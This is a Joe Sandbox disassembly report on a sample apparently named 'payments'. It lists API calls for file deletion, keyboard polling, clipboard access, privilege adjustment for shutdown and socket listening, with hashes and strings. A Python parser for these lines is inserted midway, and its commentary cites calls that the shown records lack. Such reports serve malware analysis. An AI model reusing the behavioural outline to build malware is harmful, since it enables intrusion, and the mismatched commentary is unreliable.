                                                                                                                          • Instruction ID: 06b9653d96238c78f28568cfb5500b8647664d88444037837d2de2efcf0ab402
                                                                                                                          • Opcode Fuzzy Hash: 24ab914b706708e4e325b5c37022f589e3148ad46af62c16b44970fc99b37ac8
                                                                                                                          • Instruction Fuzzy Hash: 95727E71E14219DBDF24CF59D8847FEB7B5BF08310F14416AE859EB281EB709A81DBA0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6441
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD645F
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6474
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD64A3
                                                                                                                          • _wcscat.LIBCMT ref: 00CD64B8
                                                                                                                          • _wcscat.LIBCMT ref: 00CD64CA
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD64DA
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD64EB
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD6506
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 2643075503-1173974218
                                                                                                                          • Opcode ID: 998a20c3f6866b2a39a8874796d28555a87f22edaed82d945012be8262fc6b87
                                                                                                                          • Instruction ID: 2895c32d10cca841c6203d360114a9c313c3cbd1ce5275489621539dac422d62
                                                                                                                          • Opcode Fuzzy Hash: 998a20c3f6866b2a39a8874796d28555a87f22edaed82d945012be8262fc6b87
                                                                                                                          • Instruction Fuzzy Hash: E331B1B2408384AAC721DBA488859DBB7DCAF55300F44492FF6E9C3241EB35D64DD7A7
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF328E
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CF332D
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF33C5
                                                                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CF3604
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3611
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1240663315-0
                                                                                                                          • Opcode ID: dec16362c499e56f70a3f9f8c66a9fcaa82068d19d5cc22389830901ba80c2b8
                                                                                                                          • Instruction ID: 2ad9d644aaa28cd39d8b8e86456d6bd4d446c0fe6eec475c81b318242cc43d8e
                                                                                                                          • Opcode Fuzzy Hash: dec16362c499e56f70a3f9f8c66a9fcaa82068d19d5cc22389830901ba80c2b8
                                                                                                                          • Instruction Fuzzy Hash: C7E18C31204244AFCB14DF69C895E6ABBE9FF88314F04846DF55ADB2A1DB31EE05CB52
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00CD2B5F
                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD2BE0
                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00CD2BFB
                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD2C15
                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00CD2C2A
                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00CD2C42
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00CD2C54
                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00CD2C6C
                                                                                                                          • GetKeyState.USER32(00000012), ref: 00CD2C7E
                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD2C96
                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00CD2CA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 541375521-0
                                                                                                                          • Opcode ID: 97e5592b3900164e153fbb87d07b22bd6f017354e9f795c7c85fcf33ab99a69e
                                                                                                                          • Instruction ID: b8e3900755b4cdcbcdc428204d9166a27a714e9b6abfa79ed61782b2223a9fd3
                                                                                                                          • Opcode Fuzzy Hash: 97e5592b3900164e153fbb87d07b22bd6f017354e9f795c7c85fcf33ab99a69e
                                                                                                                          • Instruction Fuzzy Hash: 7D41B230614BC96AFB319B6088047B9BEA1AB72304F04809BD7D6563C1DBD49EC4C7A2
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1737998785-0
                                                                                                                          • Opcode ID: 7519f10dee82c55ef7febe6ba8f9d18d84beb217d4e6a8294f40cc084dcd92ed
                                                                                                                          • Instruction ID: 97bd8b093c101ce4ab1a61f50d15d9e2ad8942890514876941b8ba250b63aaf3
                                                                                                                          • Opcode Fuzzy Hash: 7519f10dee82c55ef7febe6ba8f9d18d84beb217d4e6a8294f40cc084dcd92ed
                                                                                                                          • Instruction Fuzzy Hash: FD218D31300215AFDB01AF69DC49BAD77A9FF14761F00801AF91ADB3A1DF34EA019B64
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CC9ABF: CLSIDFromProgID.OLE32 ref: 00CC9ADC
                                                                                                                            • Part of subcall function 00CC9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00CC9AF7
                                                                                                                            • Part of subcall function 00CC9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00CC9B05
                                                                                                                            • Part of subcall function 00CC9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00CC9B15
                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CEC235
                                                                                                                          • _memset.LIBCMT ref: 00CEC242
                                                                                                                          • _memset.LIBCMT ref: 00CEC360
                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00CEC38C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00CEC397
                                                                                                                          Strings
                                                                                                                          • NULL Pointer assignment, xrefs: 00CEC3E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                          • API String ID: 1300414916-2785691316
                                                                                                                          • Opcode ID: 82b2ae9a254d1f899022e62cfb9112a00d605e789480eebf96a3cbe131cde9bf
                                                                                                                          • Instruction ID: bc4b926804f34068e45e9f9122e1f6fcf3f7644854956d13f4f5e060058e64fc
                                                                                                                          • Opcode Fuzzy Hash: 82b2ae9a254d1f899022e62cfb9112a00d605e789480eebf96a3cbe131cde9bf
                                                                                                                          • Instruction Fuzzy Hash: 01914B71D00218ABDF10DF95DC95EEEBBB9EF08310F10811AF515A7291EB709A46DFA0
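The API lists in the function records above are Joe Sandbox's per-function call summaries: each line gives the API, its module, the argument values the analysis recovered (with `?` where it could not), and the call-site address, and a `Part of subcall function` prefix attributes the call to a callee. The parser below is an added example, not part of this report or of Joe Sandbox's tooling; it turns those lines into records and names the Windows SDK constants that the records above show only as raw hex (the virtual-key codes polled by GetAsyncKeyState/GetKeyState, DACL_SECURITY_INFORMATION in SetUserObjectSecurity, ACL_REVISION in AddAce, and the CLSCTX and RPC authentication/impersonation levels in the COM function). The line format is inferred from the records on this page, and the sample input is copied from them; the constant values are from the Windows SDK headers.

```python
"""Parse the 'APIs' lines of Joe Sandbox function records (the format shown
above) and name the Windows constants that appear as raw hex arguments.
Added example; not part of the report or of Joe Sandbox's tooling."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the function records above.
SAMPLE = """\
• GetLengthSid.ADVAPI32(?), ref: 00CCA78B
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCA7FA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCA820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCA834
  • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
• _wcscat.LIBCMT ref: 00CD6441
• FindFirstFileW.KERNEL32(?,?), ref: 00CD6474
• DeleteFileW.KERNEL32(?), ref: 00CD64DA
• GetAsyncKeyState.USER32(000000A0), ref: 00CD2BE0
• GetKeyState.USER32(0000005B), ref: 00CD2CA8
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CEC235
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00CEC38C
"""

# Line format inferred from the page: [Part of subcall function ADDR:] Name.MODULE[(args)] ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class Call:
    name: str
    module: str
    args: list               # int where the sandbox recovered a value, None for '?'
    ref: int                 # call-site address
    subcall: Optional[int]   # callee address when reported as part of a subcall

def parse(text: str) -> list:
    """Turn report lines into Call records; lines that do not match (headers) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw.split(",") if a.strip()]
        calls.append(Call(m.group("name"), m.group("mod"), args, int(m.group("ref"), 16),
                          int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

# Windows SDK constants (winuser.h, winnt.h, objbase.h, rpcdce.h).
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
SECINFO = {1: "OWNER_SECURITY_INFORMATION", 2: "GROUP_SECURITY_INFORMATION",
           4: "DACL_SECURITY_INFORMATION", 8: "SACL_SECURITY_INFORMATION"}
CLSCTX = {1: "CLSCTX_INPROC_SERVER", 2: "CLSCTX_INPROC_HANDLER",
          4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
AUTHN = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT",
         5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
IMP = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}

def flags(value: int, table: dict) -> str:
    """Render a bit mask as 'A|B'; bits the table does not know stay as hex."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"

# (API name, argument index) -> decoder for that argument.
# Note: the report prints byte immediates zero-extended, so the 000000FF seen as
# cAuthSvc in CoInitializeSecurity is most likely a push of -1 (an assumption).
DECODERS = {
    ("GetAsyncKeyState", 0): lambda v: VK.get(v, f"VK 0x{v:02X}"),
    ("GetKeyState", 0): lambda v: VK.get(v, f"VK 0x{v:02X}"),
    ("SetUserObjectSecurity", 1): lambda v: flags(v, SECINFO),
    ("AddAce", 1): lambda v: {2: "ACL_REVISION", 4: "ACL_REVISION_DS"}.get(v, hex(v)),
    ("SetSecurityDescriptorDacl", 1): lambda v: f"bDaclPresent={bool(v)}",
    ("SetSecurityDescriptorDacl", 3): lambda v: f"bDaclDefaulted={bool(v)}",
    ("CoInitializeSecurity", 4): lambda v: "RPC_C_AUTHN_LEVEL_" + AUTHN.get(v, hex(v)),
    ("CoInitializeSecurity", 5): lambda v: "RPC_C_IMP_LEVEL_" + IMP.get(v, hex(v)),
    ("CoCreateInstanceEx", 2): lambda v: flags(v, CLSCTX),
}

def annotate(call: Call) -> list:
    """Names for the arguments a decoder knows about; '?' arguments are skipped."""
    out = []
    for i, v in enumerate(call.args):
        dec = DECODERS.get((call.name, i))
        if dec is not None and v is not None:
            out.append(f"arg{i}={dec(v)}")
    return out

if __name__ == "__main__":
    for c in parse(SAMPLE):
        print(f"{c.name}.{c.module}@{c.ref:08X}", " ".join(annotate(c)))
```

Run as-is, the script prints one line per sample call with the decoded constants; to use it on another record, paste that record's API lines into `SAMPLE` (or read them from a file) and extend `DECODERS` with the argument positions you care about. Keeping the decoders keyed by (API, argument index) rather than by value avoids mislabelling a number that happens to coincide with a constant in an unrelated call.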
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                            • Part of subcall function 00CCB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                            • Part of subcall function 00CCB134: GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00CD7A0F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                                          • API String ID: 2234035333-194228
                                                                                                                          • Opcode ID: 4569e61f999c14182ad3c3578301ef0e8a3a2db648fe6d5cae75ae07374f0644
                                                                                                                          • Instruction ID: dfe7ca9b5dc92ba7bb76b20e644f7847fe178b9435bd65545a1f543ea107ba08
                                                                                                                          • Opcode Fuzzy Hash: 4569e61f999c14182ad3c3578301ef0e8a3a2db648fe6d5cae75ae07374f0644
                                                                                                                          • Instruction Fuzzy Hash: 8B01D8716583216AF72816A4CC5ABBF73589B00344F14661AFF17E22C2FA705F00A1B0
                                                                                                                          APIs
                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CE8CA8
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8CB7
                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00CE8CD3
                                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00CE8CE2
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8CFC
                                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00CE8D10
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279440585-0
                                                                                                                          • Opcode ID: b6024116f26054511a1a94c9326c57f98f178689a115ac752076ba3585374db4
                                                                                                                          • Instruction ID: 92e61533550099dfe9901afc52685408e039ba1f85ee9c7e256f7ecf1dc981f1
                                                                                                                          • Opcode Fuzzy Hash: b6024116f26054511a1a94c9326c57f98f178689a115ac752076ba3585374db4
                                                                                                                          • Instruction Fuzzy Hash: 1821A231600601AFCB10AF68CD85B6E77A9EF49324F148158F91BE73D2CB30AE46DB61
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6554
                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6564
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CD6583
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD65A7
                                                                                                                          • _wcscat.LIBCMT ref: 00CD65BA
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD65F9
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1605983538-0
                                                                                                                          • Opcode ID: c8712346fcdb5220b13e4103d5014d7e479d982955c252fdc569365846ef6658
                                                                                                                          • Instruction ID: 9b60e83fe7fb115462ecfedf81f64885d5743c474390b876d6874d9d2f50796f
                                                                                                                          • Opcode Fuzzy Hash: c8712346fcdb5220b13e4103d5014d7e479d982955c252fdc569365846ef6658
                                                                                                                          • Instruction Fuzzy Hash: 7F215371900218ABDF11ABA4DC89BEEB7FDAB44300F5044E6E605D7241EB719FC5CB60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CEA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00CE9296
                                                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00CE92B9
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4170576061-0
                                                                                                                          • Opcode ID: 96366228619ee7f1561840f2e52191584d11b51f691b41b4ac66194fdfab3751
                                                                                                                          • Instruction ID: 4b1acca1a47e1f8a8a7d23efdba27c4ce7dbc93510a7f6034dd31b9c181ac3d8
                                                                                                                          • Opcode Fuzzy Hash: 96366228619ee7f1561840f2e52191584d11b51f691b41b4ac66194fdfab3751
                                                                                                                          • Instruction Fuzzy Hash: C241D270600201AFDB10AF68C886E7E77EDEF45728F04844CF956AB3D2DB749D019BA1
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDEB8A
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDEBBA
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDEBCF
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CDEBE0
                                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CDEC0E
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2387731787-0
                                                                                                                          • Opcode ID: eb437ca68f192c8b4664e1ea20b4e6e66280530159c42a0548160ab5e9f6f1f1
                                                                                                                          • Instruction ID: 4f9a17b5f77274dc39ffdb8506641e308f2e71a941b325327663e7a396efe788
                                                                                                                          • Opcode Fuzzy Hash: eb437ca68f192c8b4664e1ea20b4e6e66280530159c42a0548160ab5e9f6f1f1
                                                                                                                          • Instruction Fuzzy Hash: 4241B0356047029FC718EF68C491AA9B3E4FF49324F10455EEA6ACB3A1DB31BA45CB91
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 292994002-0
                                                                                                                          • Opcode ID: 89a71b44ef3c2ed82ac1eb30dbd4116cfca304f4a637105252fa090af2585bfa
                                                                                                                          • Instruction ID: dfd0b4d4f1d30fcc46b0f7fdf7633b56be269962ecc1293ba1fc36c4698a1a18
                                                                                                                          • Opcode Fuzzy Hash: 89a71b44ef3c2ed82ac1eb30dbd4116cfca304f4a637105252fa090af2585bfa
                                                                                                                          • Instruction Fuzzy Hash: FF1190313002197BEB212F269C44ABE7B9DEF45760B048529FA49D7281CF34990786A6
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                          • API String ID: 0-1546025612
                                                                                                                          • Opcode ID: fe0cfc077b31826eda42b727217e63b372db6f5c9b92a65d196881d457f60a4d
                                                                                                                          • Instruction ID: 530bde14b9c3be542e82bd0d3ea1ce614476ae25b15bbe80f90ecb32b0811e48
                                                                                                                          • Opcode Fuzzy Hash: fe0cfc077b31826eda42b727217e63b372db6f5c9b92a65d196881d457f60a4d
                                                                                                                          • Instruction Fuzzy Hash: 65926C71E0021ADBDF24CF59D8847EDB7B1FB54314F14819AE81AAB280DB719EC1DBA1
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE014,76F90AE0,00CADEF1,00D2DC38,?,?), ref: 00CAE02C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CAE03E
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                          • API String ID: 2574300362-192647395
                                                                                                                          • Opcode ID: 514af384f1537359704126e6938c728ad507d36bf91817e7d85cce60da69813e
                                                                                                                          • Instruction ID: eef9c30d84fae12221142f1f9e5751a78a11eed33e0e9b550249156c015b2a02
                                                                                                                          • Opcode Fuzzy Hash: 514af384f1537359704126e6938c728ad507d36bf91817e7d85cce60da69813e
                                                                                                                          • Instruction Fuzzy Hash: 67D0C770500723BFD7355F65EC086627AE5AB05715F188429F495D2250DBB4D9C586B0
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CD13DC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID: ($|
                                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                                          • Opcode ID: 8df3ca96a6b0131ba4e81094b0127a05bdb8bd4c1c642c3d1231b6ac5cf7eecb
                                                                                                                          • Instruction ID: 605b1456b14bab13147607af240f2cda22af4c21a0b8f49c53fccb17bfc311e6
                                                                                                                          • Opcode Fuzzy Hash: 8df3ca96a6b0131ba4e81094b0127a05bdb8bd4c1c642c3d1231b6ac5cf7eecb
                                                                                                                          • Instruction Fuzzy Hash: 9E321775A00705AFC728CF69D49096AB7F0FF48320B15C56EE9AADB3A1E770E941CB44
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00CAB22F
                                                                                                                            • Part of subcall function 00CAB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CAB5A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Proc$LongWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2749884682-0
                                                                                                                          • Opcode ID: f0eab7dbdfc5cdd79ae8565d369e3a2b421dcf92bc43f062251652b7b9644166
